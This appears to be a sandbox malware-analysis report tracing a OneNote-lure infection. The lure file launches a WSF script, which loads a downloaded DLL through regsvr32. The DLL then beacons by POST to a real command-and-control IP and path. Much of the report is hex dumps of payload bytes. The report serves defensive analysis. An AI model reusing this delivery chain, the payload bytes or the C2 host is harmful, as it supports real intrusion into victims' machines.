                                                                                                        2023-03-17 15:45:09 UTC48INData Raw: e6 c7 00 00 f2 c7 00 00 fe c7 00 00 7c c8 00 00 83 c8 00 00 8a c8 00 00 91 c8 00 00 98 c8 00 00 9f c8 00 00 a6 c8 00 00 ad c8 00 00 b4 c8 00 00 bb c8 00 00 c2 c8 00 00 c9 c8 00 00 d0 c8 00 00 d7 c8 00 00 de c8 00 00 e5 c8 00 00 45 33 c0 e9 00 00 00 00 48 89 5c 24 08 57 48 83 ec 40 48 8b da 48 8b f9 48 85 c9 75 14 e8 ca bc ff ff c7 00 16 00 00 00 e8 83 bb ff ff 33 c0 eb 60 48 85 db 74 e7 48 3b fb 73 f2 49 8b d0 48 8d 4c 24 20 e8 ac c7 ff ff 48 8b 4c 24 30 48 8d 53 ff 83 79 08 00 74 24 48 ff ca 48 3b fa 77 0a 0f b6 02 f6 44 08 19 04 75 ee 48 8b cb 48 2b ca 48 8b d3 83 e1 01 48 2b d1 48 ff ca 80 7c 24 38 00 74 0c 48 8b 4c 24 20 83 a1 a8 03 00 00 fd 48 8b c2 48 8b 5c 24 50 48 83 c4 40 5f c3 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 30 48 89 5d 60
                                                                                                        Data Ascii: |E3H\$WH@HHHu3`HtH;sIHL$ HL$0HSyt$HH;wDuHH+HH+H|$8tHL$ HH\$PH@_@UATAUAVAWH`Hl$0H]`
                                                                                                        2023-03-17 15:45:09 UTC64INData Raw: 00 00 b8 01 0d 0a 38 30 30 30 0d 0a 00 00 00 48 83 c4 78 c3 cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 78 c7 44 24 20 50 00 00 00 c7 44 24 24 03 00 00 00 48 8d 05 f0 fc ff ff 48 89 44 24 28 c7 44 24 30 00 00 00 00 c7 44 24 34 00 00 00 00 48 8b 84 24 80 00 00 00 48 89 44 24 38 48 c7 44 24 40 00 00 00 00 ba 00 7f 00 00 33 c9 ff 15 80 58 00 00 48 89 44 24 48 48 c7 44 24 50 06 00 00 00 48 c7 44 24 58 00 00 00 00 48 8d 05 6a 22 01 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 8d 4c 24 20 ff 15 71 58 00 00 48 83 c4 78 c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 38 48 c7 44 24 20 00 00 00 00 ba e5 59 51 9e 48 8b 0d 0f 22 01 00 e8 72 03 00 00 48 89 44 24 20 ff 54 24 20 41 b9 05 00 00 00 45 33 c0 48 8b 15 f9 21 01 00 48 8b 0d f2 21 01 00 e8 dd 41 00 00
                                                                                                        Data Ascii: 8000HxHL$HxD$ PD$$HHD$(D$0D$4H$HD$8HD$@3XHD$HHD$PHD$XHj"HD$`HD$hHL$ qXHxH8HD$ YQH"rHD$ T$ AE3H!H!A
                                                                                                        2023-03-17 15:45:09 UTC80INData Raw: 00 17 00 00 33 d2 33 c9 ff 15 1e 19 00 00 85 c0 75 06 ff 15 ec 16 00 00 33 d2 33 c9 ff 15 0a 19 00 00 85 c0 75 06 ff 15 d8 16 00 00 33 d2 33 c9 ff 15 f6 18 00 00 85 c0 75 06 ff 15 c4 16 00 00 33 d2 33 c9 ff 15 e2 18 00 00 85 c0 75 06 ff 15 b0 16 00 00 33 d2 33 c9 ff 15 ce 18 00 00 85 c0 75 06 ff 15 9c 16 00 00 33 d2 33 c9 ff 15 ba 18 00 00 85 c0 75 06 ff 15 88 16 00 00 33 d2 33 c9 ff 15 a6 18 00 00 85 c0 75 06 ff 15 74 16 00 00 33 d2 33 c9 ff 15 92 18 00 00 85 c0 75 06 ff 15 60 16 00 00 33 d2 33 c9 ff 15 7e 18 00 00 85 c0 75 06 ff 15 4c 16 00 00 33 d2 33 c9 ff 15 6a 18 00 00 85 c0 75 06 ff 15 38 16 00 00 33 d2 33 c9 ff 15 56 18 00 00 85 c0 75 06 ff 15 24 16 00 00 33 d2 33 c9 ff 15 42 18 00 00 85 c0 75 06 ff 15 10 16 00 00 33 d2 33 c9 ff 15 2e 18 00 00 85
                                                                                                        Data Ascii: 33u33u33u33u33u33u33ut33u`33~uL33ju833Vu$33Bu33.
                                                                                                        2023-03-17 15:45:09 UTC96INData Raw: 00 00 00 00 f8 a0 01 80 01 00 00 00 0d 0a 38 30 30 30 0d 0a 23 00 00 00 00 00 00 00 00 a1 01 80 01 00 00 00 24 00 00 00 00 00 00 00 08 a1 01 80 01 00 00 00 25 00 00 00 00 00 00 00 10 a1 01 80 01 00 00 00 26 00 00 00 00 00 00 00 18 a1 01 80 01 00 00 00 27 00 00 00 00 00 00 00 20 a1 01 80 01 00 00 00 29 00 00 00 00 00 00 00 28 a1 01 80 01 00 00 00 2a 00 00 00 00 00 00 00 30 a1 01 80 01 00 00 00 2b 00 00 00 00 00 00 00 38 a1 01 80 01 00 00 00 2c 00 00 00 00 00 00 00 40 a1 01 80 01 00 00 00 2d 00 00 00 00 00 00 00 48 a1 01 80 01 00 00 00 2f 00 00 00 00 00 00 00 50 a1 01 80 01 00 00 00 36 00 00 00 00 00 00 00 58 a1 01 80 01 00 00 00 37 00 00 00 00 00 00 00 60 a1 01 80 01 00 00 00 38 00 00 00 00 00 00 00 68 a1 01 80 01 00 00 00 39 00 00 00 00 00 00 00 70 a1 01
                                                                                                        Data Ascii: 8000#$%&' )(*0+8,@-H/P6X7`8h9p
                                                                                                        2023-03-17 15:45:09 UTC112INData Raw: 78 5b 05 3e 64 6e b1 d4 2d 2f 21 3e 0c f5 39 d9 ad c4 37 3e fc 80 71 62 84 17 28 3e 61 49 e1 c7 62 51 ea 3d 63 51 36 19 90 0c 31 3e 88 76 a1 2b 4d 3c 37 3e 81 3d e9 e0 a5 e8 2a 3e af 21 16 f0 c6 b0 2a 3e 66 5b dd 74 8b 1e 30 3e 94 54 bb ec 6f 20 2d 3e 00 cc 4f 72 8b b4 f0 3d 29 e2 61 0b 1f 83 3f 3e af bc 07 c4 97 1a f8 3d aa b7 cb 1c 6c 28 3e 3e 93 0a 22 49 0b 63 28 3e 5c 2c a2 c1 15 0b ff 3d 46 09 1c e7 45 54 35 3e 85 6d 06 f8 30 e6 3b 3e 39 6c d9 f0 df 99 25 3e 81 b0 8f b1 85 cc 36 3e c8 a8 1e 00 6d 47 34 3e 1f d3 16 9e 88 3f 37 3e 87 2a 79 0d 10 57 33 3e f6 01 61 ae 79 d1 3b 3e e2 f6 c3 56 10 a3 0c 3e fb 08 9c 62 70 28 3d 3e 3f 67 d2 80 38 ba 3a 3e a6 7d 29 cb 33 36 2c 3e 02 ea ef 99 38 84 21 3e e6 08 20 9d c9 cc 3b 3e 50 d3 bd 44 05 00 38 3e e1 6a 60
                                                                                                        Data Ascii: x[>dn-/!>97>qb(>aIbQ=cQ61>v+M<7>=*>!*>f[t0>To ->Or=)a?>=l(>>"Ic(>\,=FET5>m0;>9l%>6>mG4>?7>*yW3>ay;>V>bp(=>?g8:>})36,>8!> ;>PD8>j`
                                                                                                        2023-03-17 15:45:09 UTC128INData Raw: 54 eb 01 00 d0 1e 00 00 0c 1f 00 00 54 eb 01 00 20 1f 00 00 0d 0a 38 30 30 30 0d 0a 71 1f 00 00 c8 eb 01 00 74 1f 00 00 d6 1f 00 00 14 ea 01 00 d8 1f 00 00 02 20 00 00 e4 e9 01 00 04 20 00 00 68 20 00 00 f0 ea 01 00 68 20 00 00 34 21 00 00 6c eb 01 00 34 21 00 00 72 22 00 00 98 eb 01 00 74 22 00 00 77 23 00 00 84 eb 01 00 78 23 00 00 b2 23 00 00 e4 e9 01 00 b4 23 00 00 07 24 00 00 54 eb 01 00 08 24 00 00 1a 24 00 00 d0 e9 01 00 1c 24 00 00 2e 24 00 00 d0 e9 01 00 30 24 00 00 48 24 00 00 e4 e9 01 00 48 24 00 00 60 24 00 00 e4 e9 01 00 60 24 00 00 e6 24 00 00 b4 eb 01 00 e8 24 00 00 55 25 00 00 f4 eb 01 00 5c 25 00 00 8b 25 00 00 e4 e9 01 00 b0 25 00 00 16 26 00 00 54 eb 01 00 18 26 00 00 22 26 00 00 d0 e9 01 00 30 26 00 00 4a 26 00 00 d0 e9 01 00 60 26 00
                                                                                                        Data Ascii: TT 8000qt h h 4!l4!r"t"w#x###$T$$$.$0$H$H$`$`$$$U%\%%%&T&"&0&J&`&
                                                                                                        2023-03-17 15:45:09 UTC144INData Raw: 35 48 33 95 8a b8 c0 c4 95 da 78 ec 94 de 47 99 e9 82 63 b0 b2 a3 70 62 41 c2 b0 fc 70 78 3c 17 c9 97 cf a0 e4 ca 35 48 33 5f 73 f7 9e a3 b0 0a 52 26 45 9e 11 53 28 ea e8 49 3e 2b 71 a0 b6 93 97 f5 f4 08 3d 59 3c 9e 4b 21 51 c9 b9 38 32 62 6b f7 80 a5 df 7c da b3 35 36 44 53 e9 ce 15 38 3f 2b 7e e3 f4 33 34 74 71 74 87 7a 6e af b5 59 50 42 34 e9 71 62 6b 48 ec 30 11 2a d2 93 3d 36 44 53 a8 37 e9 94 fe 86 09 63 41 43 3c f5 c4 00 3d 59 3c a6 fe 30 51 c3 81 30 32 62 6b 06 e4 27 35 f1 d6 5e 44 37 44 17 a3 e6 15 38 3f 2b 35 e9 c4 cb 34 74 71 f3 b1 d9 3d 68 30 a8 15 66 14 a0 df 22 6a 00 52 ad 53 f3 5b 9e e1 16 44 53 15 83 2b 39 3f 24 f5 32 bf bc ca 9d f4 85 c3 a6 f0 a4 f7 65 75 52 50 5b 33 62 ac 44 45 70 45 fe 53 26 82 73 60 4b a7 61 65 39 7b a0 35 46 59 fb 96
                                                                                                        Data Ascii: 5H3xGcpbApx<5H3_sR&ES(I>+q=Y<K!Q82bk|56DS8?+~34tqtznYPB4qbkH0*=6DS7cAC<=Y<0Q02bk'5^D7D8?+54tq=h0f"jRS[DS+9?$2euRP[3bDEpES&s`Kae9{5FY
                                                                                                        2023-03-17 15:45:09 UTC160INData Raw: 61 64 b4 84 08 f7 45 37 4b d7 80 6b 65 39 be d5 23 b0 41 43 3a f0 e3 78 3c 59 bd 96 0d 0a 32 35 38 34 30 0d 0a 37 c9 51 42 3b cd fe 66 6b 00 a6 20 11 0a 8d db 45 37 c5 17 0c 1b ce 11 c0 d4 b0 06 65 33 31 f5 05 5c 4c 99 8c 61 30 e6 14 2a ca 34 33 62 e0 45 09 e9 39 3a 92 c7 40 be 09 3b a9 2e 0d e6 df d4 8e e3 34 2b 75 cc 55 78 fb 1c 5c ef 91 21 51 c3 71 28 12 11 6b 00 e0 11 55 7b f1 95 5d 5c 01 33 42 e2 20 59 be 6e 11 14 0e bc ca f5 04 18 1a 6f cb 51 74 aa 1c 22 bf 1d 5b e9 27 24 11 28 be 3f f3 ce bf 7c 45 53 96 5c d5 39 3f c2 84 96 be bc 8b 2f a0 78 3c b0 cc 9c cf de 96 07 54 57 97 62 6b b8 e4 74 77 72 d8 6b 25 c0 a5 eb ab d5 c5 16 14 e1 a0 8b 42 89 f4 9d 77 f1 71 39 fd 0d 50 25 da 0f 54 bf d2 a3 81 03 e8 31 55 bb 36 46 46 b6 31 33 19 f6 6b 39 b4 6e 11 8a
                                                                                                        Data Ascii: adE7Kke9#AC:x<Y258407QB;fk E7e31\La0*43bE9:@;.4+uUx\!Qq(kU{]\3B YnoQt"['$(?|ES\9?/x<TWbktwrk%Bwq9P%T1U6FF13k9n
                                                                                                        2023-03-17 15:45:09 UTC176INData Raw: 72 bb 07 61 64 f4 17 43 36 84 52 54 5f a9 26 75 89 03 df 66 e3 34 53 5b 88 dd 1d bd 2c 2c 41 ce 65 3a c9 71 58 ba 27 bb c7 24 74 86 44 53 26 c4 42 54 d0 7f e8 3b b8 4a 3b 9f 0a c5 02 be 31 61 f1 79 bd fb 2d 10 0d cb 42 34 f0 16 2b f9 24 e0 29 15 f8 79 de 3c b6 01 73 77 1b 9a c6 be 6e 51 43 a5 bc ca f5 04 58 3f 56 c4 11 f7 64 95 93 71 48 33 e3 26 c4 79 97 4b 65 d2 53 81 45 c0 58 4d ac 20 11 91 93 71 62 80 26 1d 7b f0 35 14 24 35 37 87 e0 3c 6a 37 c9 46 4a 2f 3f 8f 7b f2 3f 4b b0 34 37 44 92 4d 73 67 b2 72 33 86 83 6a 89 e4 9d 72 b2 fd b0 38 e1 7d 39 d0 0f 2c b0 77 20 2b 8b 24 7c b8 76 13 e7 a4 32 cd 1e 30 d2 69 39 3f 2b f0 17 59 b8 2e a1 69 bf 79 49 f0 66 30 21 3a 07 24 5b ba 27 7b c1 0c 74 32 fb 16 36 ad 62 44 53 e9 06 75 30 be 5e 61 15 9e 44 35 b3 34 b8
                                                                                                        Data Ascii: radC6RT_&uf4S[,,Ae:qX'$tDS&BT;J;1ay-B4+$)y<swnQCX?VdqH3&yKeSEXM qb&{5$57<j7FJ/?{?K47DMsgr3jr8}9,w +$|v20i9?+Y.iyIf0!:$['{t26bDSu0^aD54
                                                                                                        2023-03-17 15:45:09 UTC192INData Raw: 7b 53 26 4c f6 e1 53 29 6b 65 30 be ae 71 63 41 43 fc 55 8e 87 bd ec 3c 69 30 21 91 9b a4 fe b8 e7 6b 01 61 64 71 f1 d6 2e 44 37 44 d8 7c 4f 15 b2 73 0f 15 eb 05 67 15 9c 15 e1 c3 a6 74 e3 ad d9 51 42 34 04 ba 41 2e 2b 9d 20 bc 01 5b cd 37 f0 c1 5b 29 6b 65 2b 0a 2b 71 2f ca 85 f4 d9 79 79 3c 59 2c e9 b5 29 50 42 34 d3 e9 62 6b 81 d4 6c 34 7a 53 7d 23 38 44 94 ad 6b 64 39 3f f1 64 62 41 c2 b0 74 70 78 3c d9 6b 68 30 a0 d4 42 35 48 33 ec 06 ff 9e a5 90 7a 52 26 45 3a 85 f6 28 6a 65 39 37 aa c4 62 40 43 35 db 91 7d 61 d2 a9 68 31 21 51 c9 b9 40 32 62 6b e8 b3 7d 35 7a 16 15 b3 7e cf 95 60 ea a1 91 3e 2b 71 23 1e 02 6b 35 2c 39 60 06 62 33 6d e2 11 17 7c c5 5f 46 c2 48 e0 88 f5 7a 53 26 ad 26 f4 53 28 ac 20 7e 35 b4 71 62 72 83 7d fd 34 33 b5 1c 6f af 75 56
                                                                                                        Data Ascii: {S&LS)ke0qcACU<i0!kadq.D7D|OsgtQB4A.+ [7[)ke++q/yy<Y,)PB4bkl4zS}#8Dkd9?dbAtpx<kh0B5H3zR&E:(je97b@C5}ah1!Q@2bk}5z~`>+q#k5,9`b3m|_FHzS&&S( ~5qbr}43ouV
                                                                                                        2023-03-17 15:45:09 UTC208INData Raw: 04 29 6b 2d b0 ba 9b 71 62 41 84 b0 34 70 78 3c 1f 1a 68 30 a0 dc 02 35 48 33 12 60 f4 37 e5 80 3a 52 26 45 25 6b a7 7e e0 e0 79 3e 2b 71 eb c4 03 34 74 71 bf b9 19 3d 68 30 dd 28 42 34 c9 b6 22 6a 00 61 c3 3b 85 ac e7 e8 77 45 53 28 61 e4 8c 7f 2a 71 62 c7 bc 0a 74 fa fd 7c 58 3c 68 b9 a4 11 43 34 48 f4 e7 2b 01 61 64 8a 7e 53 26 c4 82 04 52 28 6b 6d 3a 3c b3 f0 e7 01 42 35 74 10 51 3c 59 fd c5 70 20 51 42 33 89 9e 22 6a 00 61 6a b4 cf 13 27 45 37 e0 57 28 6b ee bc 7f 2a 71 62 c8 c6 75 75 71 78 74 d4 39 47 10 21 51 0a bd cd 9b 62 6b 00 a6 e1 75 7b 53 26 81 aa 44 53 43 ee 25 38 3f 2b 16 eb c4 03 34 74 71 13 b9 19 3d 68 30 1e d8 c7 74 49 33 62 ea b5 21 65 35 7a bf e4 0b 31 c5 e6 68 6a 65 39 93 14 a1 6b ca c6 75 75 71 78 b5 dc 7c 69 30 21 96 c7 74 49 33 62
                                                                                                        Data Ascii: )k-qbA4px<h05H3`7:R&E%k~y>+q4tq=h0(B4"ja;wES(a*qbt|X<hC4H+ad~S&R(km:<B5tQ<Yp QB3"jaj'E7W(k*qbuuqxt9G!Qbku{S&DSC%8?+4tq=h0tI3b!e5z1hje9kuuqx|i0!tI3b
                                                                                                        2023-03-17 15:45:09 UTC224INData Raw: 63 fa ac a9 ae 33 8b 8e f1 7f 51 84 5d 97 21 51 ab 64 b6 cc 9d ac 45 a1 08 2e 7a 53 e7 28 f7 4d d8 6d ab 66 f9 b6 6e b1 da de 51 d1 5d fa 35 fc ae dd 43 fa f0 b8 41 fe 89 da 67 e2 4d a1 2c be b1 d2 53 85 22 43 5b 28 ac 20 f1 b2 cb 71 62 c0 06 fd c8 5a 87 c3 98 51 a0 3e a0 24 8a ed c2 35 62 ac 45 79 bc 1a 7a 53 a7 30 2f 4b b4 ce 7c ee 7c 27 ea 91 60 c8 06 2d f5 04 60 a6 73 9b 1e b1 54 49 e6 a0 7c 1a a5 2e c4 a6 c6 35 7a 92 43 81 3d c5 26 ec e6 90 e4 6c aa 04 a6 e5 53 66 25 fa 3d f8 1d b7 25 28 65 da 07 fc c3 66 a2 e2 44 45 4c 7d f7 16 f6 0d be 00 77 08 83 b3 13 c0 d4 c9 7d 45 43 35 9d ed 85 c3 a6 fb 2d 28 84 32 42 34 04 be 2c 7b 48 ec 29 e5 fb 1e 3e bf 31 df 2d a9 2e 7d 57 5a d4 8e e3 34 5b e9 47 47 b1 fd 34 24 6f b1 54 49 b4 99 29 32 a5 2e c8 4c 55 35 7a
                                                                                                        Data Ascii: c3Q]!QdE.zS(MmfnQ]5CAgM,S"C[( qbZQ>$5bEyzS0/K||'`-`sTI|.5zC=&lSf%=%(efDEL}w}EC5-(2B4,{H)>1-.}WZ4[GG4$oTI)2.LU5z
                                                                                                        2023-03-17 15:45:09 UTC240INData Raw: 75 71 30 b5 6c 28 6a 31 21 96 07 d4 68 54 62 6b c1 0c 84 3a fb 26 c6 bf 37 44 53 ef 2e 5d 14 d0 2b 71 a3 2c 7b 3a f5 3c 40 93 41 a2 1b b1 64 69 fd b5 48 33 e3 2e 38 57 99 35 7a d2 53 7d 0a 37 c9 5b ac 20 11 4f 16 71 62 80 2e 1d 7a b0 1d 14 54 bd 1d 18 77 32 42 34 8f 76 02 71 fb 61 64 b4 37 33 9d 08 5e 10 92 4d 0b 68 b8 7a 4b af fd be bc f4 11 11 74 bd 2c 5c 23 4c d3 3e 85 71 18 fe d0 6b 00 e0 11 65 69 a9 c1 9a b6 31 03 61 64 40 de be 6e 21 c9 ac bc ca f5 04 28 c4 00 fd 50 bb 64 01 cb 70 6c 0b 2a e6 05 75 ec 35 7a 1b af 01 13 74 d8 6d 0b 21 b2 72 03 f8 26 65 6b 79 fd 05 5c 1c 1d b7 2d d0 aa 04 7a dc 2f 13 62 6b 8b 6c 8d 34 7b 53 9c 47 37 44 53 ad ab dd 9a b4 05 cb 6d 05 89 bc 79 a5 79 3d 59 fb 2d 50 96 ab 42 34 c9 76 02 72 b3 9e 9b f4 17 33 2f ce 7a 24 a4
                                                                                                        Data Ascii: uq0l(j1!hTbk:&7DS.]+q,{:<@AdiH3.8W5zS}7[ Oqb.zTw2B4vqad73^MhzKt,\#L>qkei1ad@n!(Pdpl*u5ztm!r&eky\-z/bkl4{SG7DSmyy=Y-PB4vr3/z$
                                                                                                        2023-03-17 15:45:09 UTC256INData Raw: 0f b9 64 46 85 71 2f 85 7a 6b 00 e0 11 52 e9 c9 16 c3 f6 21 34 2c ea 10 5e fe 2e 07 d9 ca 06 52 fd 34 43 fb 1c 5b a2 60 21 51 c3 79 2f 4a 27 6f 22 e0 11 52 0a 6b 4a e6 bc 01 34 a1 2e 7a fe 7a 4c bd d4 41 43 b4 39 16 78 18 8d d0 e9 45 46 72 cd df 61 b8 27 0c 89 24 2f f2 3f 34 b6 d0 37 44 d2 6d 0c e7 e7 3f 2b f0 27 26 d5 d2 8b 8e b9 59 3e 3f e9 45 46 fe 9e 41 8a b8 27 0c 89 24 53 f2 3f 34 64 5c 37 44 d2 65 0c b2 64 68 ad b0 0f 26 4c b4 31 16 b9 cd a6 c3 a9 55 46 41 c3 41 2f a1 57 63 7f ea 21 52 f3 16 05 82 72 2b 6e ad 6b 65 b8 4a 44 7d f5 8e 3c b4 31 1e 8a a8 a6 c3 a9 5d 4e 53 c3 41 27 be cb 98 1f a6 21 c2 44 50 26 45 b6 31 a4 49 20 80 07 be 5e 86 d8 4b b6 a7 b3 34 0f ce 71 3c 68 5b 64 26 67 bd 0d 44 b3 06 77 0a 21 42 2c da 63 32 b6 31 24 70 d8 94 39 f8 6e
                                                                                                        Data Ascii: dFq/zkR!4,^.R4C[`!Qy/J'o"RkJ4.zzLAC9xEFra'$/?47Dm?+'&Y>?EFA'$S?4d\7Dedh&L1UFAA/Wc!Rr+nkeJD}<1]NSA'!DP&E1I ^K4q<h[d&gDw!B,c21$p9n
                                                                                                        2023-03-17 15:45:09 UTC272INData Raw: 0c 17 52 e0 4c 45 2c be 7e 77 15 8d be 0e 57 ef 2f 41 09 09 60 71 62 80 2f 11 44 74 f3 78 7d 0c e1 74 05 61 c3 40 6c 03 dd 68 4f 2f e5 71 5e 63 e0 6c c8 bb d2 5c 4f 55 60 27 69 3f e9 05 67 05 fd 35 5c 0c 11 bf ac 18 e2 d8 0e 10 40 66 31 23 8b 8d 2c b6 96 1b e1 00 17 ba 42 28 6b dd de 4f 2b 71 51 9a 84 70 50 52 59 3c 59 01 ab 78 21 51 4d b0 22 31 62 6b 3d 86 14 35 7a 5c a2 b9 36 44 53 15 3e e7 39 3f 24 f5 55 40 43 35 49 d7 cd 3c 59 33 ec 86 22 51 42 09 13 f8 62 6b 0f e4 fb 36 7a 53 e1 00 1f ee 32 28 6b dd ba 81 8b 5e e3 0c 6b 8f aa 59 ce bd 1c 14 38 fe de ae c3 41 60 c1 8b 40 b6 a6 21 15 8d 65 26 45 bc 09 73 df 8a a4 d3 3c a2 24 42 80 2e 15 7b f0 3d 1c ef fa 68 30 a0 24 62 35 28 33 62 ac 45 79 32 84 7a 53 e7 28 2f 46 d2 5d 73 0f c4 85 07 f0 27 59 84 14 74
                                                                                                        Data Ascii: RLE,~wW/A`qb/Dtx}ta@lhO/q^cl\OU`'i?g5\@f1#,B(kO+qQpPRY<Yx!QM"1bk=5z\6DS>9?$U@C5I<Y3"QBbk6zS2(k^kY8A`@!e&Es<$B.{=h0$b5(3bEy2zS(/F]s'Yt
                                                                                                        2023-03-17 15:45:09 UTC288INData Raw: e5 f1 ea 53 26 45 68 1f 0e eb a7 a9 f5 b6 67 55 6a 14 0b be 98 39 fb d0 09 84 0f 02 21 51 85 71 58 c7 fc 6b 00 5c 8b 2f 7a 53 29 c1 f7 45 53 28 56 02 0b 3f 2b 7e e6 ea 42 35 74 4c a8 cc 59 3c 67 b5 d9 50 42 34 8f 76 7a 73 f8 61 64 79 f7 5e c7 06 37 44 d2 6d 73 34 19 c0 d4 b0 0f 59 44 b4 31 69 62 d7 a6 c3 e9 45 39 f5 95 c5 b7 f4 27 7b 3e ff 64 35 fb 1e 36 aa c8 63 88 43 2e 75 6f b6 6e 61 e3 34 53 01 56 1a e7 fb 1c 14 e3 19 21 51 c3 71 60 11 6f 94 ff e0 11 1d d9 a9 d0 ba f0 01 73 24 ea 65 39 54 6e 51 4d c8 06 15 f5 04 58 e7 50 2f 68 bb 64 71 06 bf 0d 1b e9 3e 10 ea 29 2d f3 17 02 6d f0 00 77 08 a3 65 39 3f c3 d5 5a be bc f2 71 b3 3b 3c 59 a7 6c 30 21 96 07 2c e2 8f 62 6b 81 2c 7c 9b ea 14 c5 fd 94 cf 7d 92 ea 20 21 3d 8d 8e 9d c0 0e 2d 03 09 21 85 d8 79 70
                                                                                                        Data Ascii: S&EhgUj9!QqXk\/zS)ES(V?+~B5tLY<gPB4vzsady^7Dms4YD1ibE9'{>d56cC.uona4SV!Qq`os$e9TnQMXP/hdq>)-mwe9?Zq;<Yl0!,bk,|} !=-!yp
                                                                                                        2023-03-17 15:45:09 UTC304INData Raw: 37 90 f2 2a 6b 55 4e 3f 2b 4f 1a 41 43 e9 d5 73 78 7c 21 3c 68 60 58 51 42 6c e8 31 62 3b 79 61 64 2a 00 53 26 61 97 46 53 08 11 65 39 13 50 71 62 5d e3 37 74 5d 03 3c 59 3b 14 30 21 b5 e3 36 48 3b 1e 6b 00 0a 19 35 7a 1b 86 47 37 28 2e 28 6b ae b9 3f 2b 81 c3 43 43 f9 f4 71 78 4a da 3c 68 cc 80 53 42 4c cb 33 62 be 86 61 64 3d d8 51 26 9d b1 44 53 f1 ec 65 39 23 8b 73 62 9d c4 35 74 1f f0 3c 59 1c ca 32 21 21 ca 34 48 b3 eb 6b 00 49 c6 37 7a d3 af 45 37 c8 d9 28 6b 79 99 3d 2b fd e8 41 43 fd ff 71 78 e8 f9 3e 68 f8 aa 51 42 9a c7 33 62 5f a2 63 64 85 f5 53 26 bd a7 44 53 34 cb 67 39 c7 bb 71 62 ae d1 35 74 d9 d9 3e 59 cc fa 30 21 57 d6 34 48 63 c2 69 00 69 f0 35 7a e0 b3 45 37 08 f1 2a 6b d9 ac 3f 2b 2a f5 41 43 79 d6 73 78 60 ce 3c 68 9a b9 51 42 7c e8
                                                                                                        Data Ascii: 7*kUN?+OACsx|!<h`XQBl1b;yad*S&aFSe9Pqb]7t]<Y;0!6H;k5zG7(.(k?+CCqxJ<hSBL3bad=Q&DSe9#sb5t<Y2!!4HkI7zE7(ky=+ACqx>hQB3b_cdS&DS4g9qb5t>Y0!W4Hcii5zE7*k?+*ACysx`<hQB|


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.449707164.90.222.65443C:\Windows\System32\regsvr32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2023-03-17 15:46:23 UTC310OUTPOST /kjgfzohhcvsym/ggkrpukmvfsdmfdi/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Length: 0
                                                                                                        Host: 164.90.222.65
                                                                                                        2023-03-17 15:46:23 UTC310INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Fri, 17 Mar 2023 15:46:23 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        2023-03-17 15:46:23 UTC310INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:16:44:10
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Form - 16 Mar, 2023.one
                                                                                                        Imagebase:0x1360000
                                                                                                        File size:1676072 bytes
                                                                                                        MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        Target ID:1
                                                                                                        Start time:16:44:35
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                                        Imagebase:0xad0000
                                                                                                        File size:147456 bytes
                                                                                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:2
                                                                                                        Start time:16:44:46
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:/tsr
                                                                                                        Imagebase:0xcb0000
                                                                                                        File size:157872 bytes
                                                                                                        MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        Target ID:3
                                                                                                        Start time:16:44:59
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                                                                                                        Imagebase:0xcb0000
                                                                                                        File size:157872 bytes
                                                                                                        MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate

                                                                                                        Target ID:6
                                                                                                        Start time:16:45:09
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll
                                                                                                        Imagebase:0xe30000
                                                                                                        File size:20992 bytes
                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Target ID:7
                                                                                                        Start time:16:45:10
                                                                                                        Start date:17/03/2023
                                                                                                        Path:C:\Windows\System32\regsvr32.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline: "C:\Users\user\AppData\Local\Temp\radE00D6.tmp.dll"
